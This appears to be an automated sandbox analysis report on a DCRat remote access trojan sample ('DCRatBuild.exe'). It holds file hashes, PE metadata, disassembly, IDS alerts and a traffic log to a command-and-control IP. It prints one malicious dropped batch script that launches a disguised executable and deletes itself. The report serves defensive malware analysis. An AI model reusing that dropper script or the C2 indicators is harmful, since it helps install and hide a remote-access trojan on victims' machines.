                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                    Malicious:false
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):1740
                    Entropy (8bit):5.36827240602657
                    Encrypted:false
                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkhtpaqZ4x
                    MD5:B28E0CCD25623D173B2EB29F3A99B9DD
                    SHA1:070E4C4A7F903505259E41AFDF7873C31F90D591
                    SHA-256:3A108902F93EF9E952D9E748207778718A2CBAEB0AB39C41BD37E9BB0B85BF3A
                    SHA-512:17F5FBF18EE0058F928A4D7C53AA4B1191BA3110EDF8E853F145D720381FCEA650A3C997E3D56597150149771E14C529F1BDFDC4A2BBD3719336259C4DD8B342
                    Malicious:false
                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):206
                    Entropy (8bit):5.069442451279302
                    Encrypted:false
                    SSDEEP:3:mKDDBEIFK+KdTVpM3No+HK9ATScyW+jn9mbZjWMlaAEyBktKcKZG1N+E2J5xAIcD:hITg3Nou11r+DERdEyKOZG1N723fcQc
                    MD5:DA9767EBCD67A1C7979C932F6427E6E3
                    SHA1:8698DF0E761302445ABB087618D64FE277954CC8
                    SHA-256:57BBF4696CBEFAEBED13721F81B193CAABBFDE44A85CBADB20937F8A55367AC0
                    SHA-512:524938BFD7F5CB776BAC9220442BF7C9FD89AAF815DF27FFAAECFA6D0E770CF85F2B75864FBBC9FCEB14AFD77D9CBDA17330C6CB25849F1044D4AF393596CF0B
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Program Files\7-Zip\Lang\System.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\LHgpusyvSo.bat"
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):25
                    Entropy (8bit):4.323856189774724
                    Encrypted:false
                    SSDEEP:3:m/Cq4BC:PC
                    MD5:39045EA024CA14F48C2F37C6A2702FF0
                    SHA1:CCDFF6A9664860E1F940FE839B1C3B985FC3561E
                    SHA-256:25FAA16A0543531D44A5CD33CC52CB544247DD34C4A983748704FCC4F5AD9F27
                    SHA-512:B9D6077ADF267FC0B40A879ECB06AEBFC8DB5C937C1CAAC464656EB1F6EB988E2E15901DC0EFA9DE56F17AC274847B5C96901778115F8D52061C07636A0E9088
                    Malicious:false
                    Preview:IQTlqZr73C1DbFSBxqCxHpb6g
                    Process:C:\ChainBlocksurrogateagentFont\portperf.exe
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):271
                    Entropy (8bit):5.798029692736424
                    Encrypted:false
                    SSDEEP:6:MefOpGl3WqjcplHBBkVYiH1Zs3nKif76cZkCFFXWMvUdI:M63WXhyVYiVZsXKiloVS
                    MD5:337B24792391CD5717086EBDBBD54C72
                    SHA1:02CDEAD8F73FEAFD9E270358D1F7B73FCCC5042D
                    SHA-256:7050793E679134139DB57700C5A33CE4CB1F9748CA183730F727FBB4BA822601
                    SHA-512:D861CF7E35206AE7AB1793661C2C209643008392B3B3285D61544548398F455858D12980C9AD21BADB42981486DD0B98163306C6B7F105F111FB00B3D6009C37
                    Malicious:false
                    Preview:qpKxT6em19xRHaChhCO5ux679ceuRVl3YF0cUv33IloQMgYdWPRMnBf2sNx1ctVgX32CjjNvJUwJJpudDBXCDZPXj8tG7BbYQH3SnW3xCgDSOWtCcUyaWTd8ofclzHxH3Y2BwczrIk9hW6INPrnnNAB7o5oH3R75s5Z0drQAfGSwT6mrXPWIdK33W5W1ysx0mEzahSthanHHsPosT6un5ybhCgdhUYLwSbKOHLJEfys0CwKHRoi17K4xnRXByMMBbVyQEZkHwpIHGle
                    Process:C:\Windows\System32\w32tm.exe
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):151
                    Entropy (8bit):4.753396717438364
                    Encrypted:false
                    SSDEEP:3:VLV993J+miJWEoJ8FXpmSvYQFy6vrBV8qXKNvj:Vx993DEUGmcYQDeV
                    MD5:32C6663B7C9103A04438C57E6A2FB9DF
                    SHA1:8FECF12DEB24DC80D28F972D2CE5FAAF74FD5834
                    SHA-256:00911D6B423154727AFD9ECBB42FDDD754F36EDF7B4EA0BE0C2DC0005DAB6115
                    SHA-512:0368F34E73DCC3C58E479076BE5B126FF02E25DA82739A861E302A43395B5FC935642F72406CCCD86A90A3983BF9BC0754C016F800161EE416CCA80F109918C9
                    Malicious:false
                    Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 22/11/2024 21:30:11..21:30:11, error: 0x80072746.21:30:16, error: 0x80072746.
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.374969486082851
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    • Win32 Executable (generic) a (10002005/4) 49.97%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:DCRatBuild.exe
                    File size:1'165'973 bytes
                    MD5:a92e55e04cc2026f53c97bdf0e91f6ba
                    SHA1:a31af958d3f885e0f55465acc214bdb0d56e672f
                    SHA256:f395305daac1c6e8fd577b85bc9132b5358c9e4c4b818b61f76d50d2477a3906
                    SHA512:441ca291ccc66f16b5252d65c23fb9f0a57f242ca35f196f41175e2c4d3adc436b026111b79fb4c77db9dbe6370e837133c1d02e571730831293e0a1ffeb95a9
                    SSDEEP:24576:U2G/nvxW3Ww0t43eblFYt2e9esxtDyVjD7D1NauFd3YP+ow7d:UbA3042rejxtDydhcQ
                    TLSH:324538017E418A11F4191233C2EF894447B5AC512AE6F32B7EBE376D95223937D1EACB
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
                    Icon Hash:1515d4d4442f2d2d
                    Entrypoint:0x41ec40
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:1
                    File Version Major:5
                    File Version Minor:1
                    Subsystem Version Major:5
                    Subsystem Version Minor:1
                    Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
                    Instruction
                    call 00007FDDD0F76F89h
                    jmp 00007FDDD0F7699Dh
                    cmp ecx, dword ptr [0043E668h]
                    jne 00007FDDD0F76B15h
                    ret
                    jmp 00007FDDD0F7710Eh
                    int3
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    mov ebp, esp
                    push esi
                    push dword ptr [ebp+08h]
                    mov esi, ecx
                    call 00007FDDD0F698A7h
                    mov dword ptr [esi], 00435580h
                    mov eax, esi
                    pop esi
                    pop ebp
                    retn 0004h
                    and dword ptr [ecx+04h], 00000000h
                    mov eax, ecx
                    and dword ptr [ecx+08h], 00000000h
                    mov dword ptr [ecx+04h], 00435588h
                    mov dword ptr [ecx], 00435580h
                    ret
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    lea eax, dword ptr [ecx+04h]
                    mov dword ptr [ecx], 00435568h
                    push eax
                    call 00007FDDD0F79CADh
                    pop ecx
                    ret
                    push ebp
                    mov ebp, esp
                    sub esp, 0Ch
                    lea ecx, dword ptr [ebp-0Ch]
                    call 00007FDDD0F6983Eh
                    push 0043B704h
                    lea eax, dword ptr [ebp-0Ch]
                    push eax
                    call 00007FDDD0F793C2h
                    int3
                    push ebp
                    mov ebp, esp
                    sub esp, 0Ch
                    lea ecx, dword ptr [ebp-0Ch]
                    call 00007FDDD0F76AB4h
                    push 0043B91Ch
                    lea eax, dword ptr [ebp-0Ch]
                    push eax
                    call 00007FDDD0F793A5h
                    int3
                    jmp 00007FDDD0F7B3F3h
                    jmp dword ptr [00433260h]
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push 00421EB0h
                    push dword ptr fs:[00000000h]
                    Programming Language:
                    • [ C ] VS2008 SP1 build 30729
                    • [IMP] VS2008 SP1 build 30729
                    • [C++] VS2015 UPD3.1 build 24215
                    • [EXP] VS2015 UPD3.1 build 24215
                    • [RES] VS2015 UPD3 build 24213
                    • [LNK] VS2015 UPD3.1 build 24215
                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0xdfd0 | .rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x2268 | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x1000 | 0x310ea | 0x31200 | c5bf61bbedb6ad471e9dc6266398e965 | False | 0.583959526081425 | data | 6.708075396341128 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata | 0x33000 | 0xa612 | 0xa800 | 7980b588d5b28128a2f3c36cabe2ce98 | False | 0.45284598214285715 | data | 5.221742709250668 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data | 0x3e000 | 0x23728 | 0x1000 | 201530c9e56f172adf2473053298d48f | False | 0.36767578125 | data | 3.7088186669877685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .didat | 0x62000 | 0x188 | 0x200 | c5d41d8f254f69e567595ab94266cfdc | False | 0.4453125 | data | 3.2982538067961342 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .rsrc | 0x63000 | 0xdfd0 | 0xe000 | f6c0f34fae6331b50a7ad2efc4bfefdb | False | 0.6370326450892857 | data | 6.6367506404157535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .reloc | 0x71000 | 0x2268 | 0x2400 | c7a942b723cb29d9c02f7c611b544b50 | False | 0.7681206597222222 | data | 6.5548620101740545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                    PNG | 0x63650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                    PNG | 0x64198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                    RT_ICON | 0x65748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
                    RT_ICON | 0x65cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
                    RT_ICON | 0x66558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
                    RT_ICON | 0x67400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
                    RT_ICON | 0x67868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
                    RT_ICON | 0x68910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
                    RT_ICON | 0x6aeb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
                    RT_DIALOG | 0x6f588 | 0x286 | data | English | United States | 0.5092879256965944
                    RT_DIALOG | 0x6f358 | 0x13a | data | English | United States | 0.60828025477707
                    RT_DIALOG | 0x6f498 | 0xec | data | English | United States | 0.6991525423728814
                    RT_DIALOG | 0x6f228 | 0x12e | data | English | United States | 0.5927152317880795
                    RT_DIALOG | 0x6eef0 | 0x338 | data | English | United States | 0.45145631067961167
                    RT_DIALOG | 0x6ec98 | 0x252 | data | English | United States | 0.5757575757575758
                    RT_STRING | 0x6ff68 | 0x1e2 | data | English | United States | 0.3900414937759336
                    RT_STRING | 0x70150 | 0x1cc | data | English | United States | 0.4282608695652174
                    RT_STRING | 0x70320 | 0x1b8 | data | English | United States | 0.45681818181818185
                    RT_STRING | 0x704d8 | 0x146 | data | English | United States | 0.5153374233128835
                    RT_STRING | 0x70620 | 0x446 | data | English | United States | 0.340036563071298
                    RT_STRING | 0x70a68 | 0x166 | data | English | United States | 0.49162011173184356
                    RT_STRING | 0x70bd0 | 0x152 | data | English | United States | 0.5059171597633136
                    RT_STRING | 0x70d28 | 0x10a | data | English | United States | 0.49624060150375937
                    RT_STRING | 0x70e38 | 0xbc | data | English | United States | 0.6329787234042553
                    RT_STRING | 0x70ef8 | 0xd6 | data | English | United States | 0.5747663551401869
                    RT_GROUP_ICON | 0x6ec30 | 0x68 | data | English | United States | 0.7019230769230769
                    RT_MANIFEST | 0x6f810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
                    DLL | Import
                    KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                    gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                    Language of compilation system | Country where language is spoken | Map
                    English | United States |
                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                    2024-11-23T02:20:10.246184+0100 | 2034194 | ET MALWARE DCRAT Activity (GET) | 1 | 192.168.2.6 | 49723 | 185.114.245.123 | 80 | TCP
                    2024-11-23T02:20:23.852194+0100 | 2850862 | ETPRO MALWARE DCRat Initial Checkin Server Response M4 | 1 | 185.114.245.123 | 80 | 192.168.2.6 | 49757 | TCP
                    2024-11-23T02:21:55.896496+0100 | 2850862 | ETPRO MALWARE DCRat Initial Checkin Server Response M4 | 1 | 185.114.245.123 | 80 | 192.168.2.6 | 49987 | TCP
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Nov 23, 2024 02:20:08.611248016 CET | 49723 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:08.730815887 CET | 80 | 49723 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:08.730906010 CET | 49723 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:08.731681108 CET | 49723 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:08.851160049 CET | 80 | 49723 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:10.246021032 CET | 80 | 49723 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:10.246107101 CET | 80 | 49723 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:10.246184111 CET | 49723 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:11.741596937 CET | 49729 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:11.751043081 CET | 49730 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:11.764272928 CET | 49723 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:11.861179113 CET | 80 | 49729 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:11.861527920 CET | 49729 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:11.861928940 CET | 49729 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:11.870604038 CET | 80 | 49730 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:11.871033907 CET | 49730 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:11.871232033 CET | 49730 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:11.873740911 CET | 49729 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:11.873745918 CET | 49730 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:11.884012938 CET | 80 | 49723 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:11.885046005 CET | 49723 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:11.950370073 CET | 49731 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:11.981445074 CET | 80 | 49729 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:11.990817070 CET | 80 | 49730 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:11.990869045 CET | 80 | 49730 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:12.036837101 CET | 80 | 49730 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:12.036854029 CET | 80 | 49729 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:12.070101023 CET | 80 | 49731 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:12.070714951 CET | 49731 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:12.104047060 CET | 49731 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:12.224217892 CET | 80 | 49731 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:12.224647045 CET | 80 | 49731 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:12.874298096 CET | 80 | 49730 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:12.874366045 CET | 49730 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:12.901292086 CET | 80 | 49729 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:12.901397943 CET | 49729 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:13.439039946 CET | 80 | 49731 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:13.490376949 CET | 49731 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:16.960494995 CET | 49731 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:16.961462975 CET | 49757 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:17.080252886 CET | 80 | 49731 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:17.080342054 CET | 49731 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:17.081015110 CET | 80 | 49757 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:17.081099033 CET | 49757 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:17.081677914 CET | 49757 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:17.201150894 CET | 80 | 49757 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:17.201251030 CET | 80 | 49757 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:18.599766016 CET | 80 | 49757 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:18.646689892 CET | 49757 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:23.647814989 CET | 49757 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:23.649060011 CET | 49775 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:23.852194071 CET | 80 | 49757 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:23.852232933 CET | 80 | 49775 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:23.852271080 CET | 49757 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:23.852338076 CET | 49775 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:23.853331089 CET | 49775 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:24.090966940 CET | 80 | 49775 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:24.091002941 CET | 80 | 49775 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:25.217832088 CET | 80 | 49775 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:25.272665024 CET | 49775 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:30.225713015 CET | 49775 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:30.226526022 CET | 49790 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:30.347023010 CET | 80 | 49790 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:30.347120047 CET | 49790 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:30.347333908 CET | 49790 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:30.349720955 CET | 80 | 49775 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:30.349873066 CET | 49775 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:30.466829062 CET | 80 | 49790 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:30.467024088 CET | 80 | 49790 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:31.825900078 CET | 80 | 49790 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:31.881086111 CET | 49790 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:36.834759951 CET | 49790 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:36.835659981 CET | 49812 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:36.954664946 CET | 80 | 49790 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:36.954726934 CET | 49790 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:36.955156088 CET | 80 | 49812 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:36.955235958 CET | 49812 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:36.955472946 CET | 49812 | 80 | 192.168.2.6 | 185.114.245.123
                    Nov 23, 2024 02:20:37.075021029 CET | 80 | 49812 | 185.114.245.123 | 192.168.2.6
                    Nov 23, 2024 02:20:37.075098991 CET | 80 | 49812 | 185.114.245.123 | 192.168.2.6
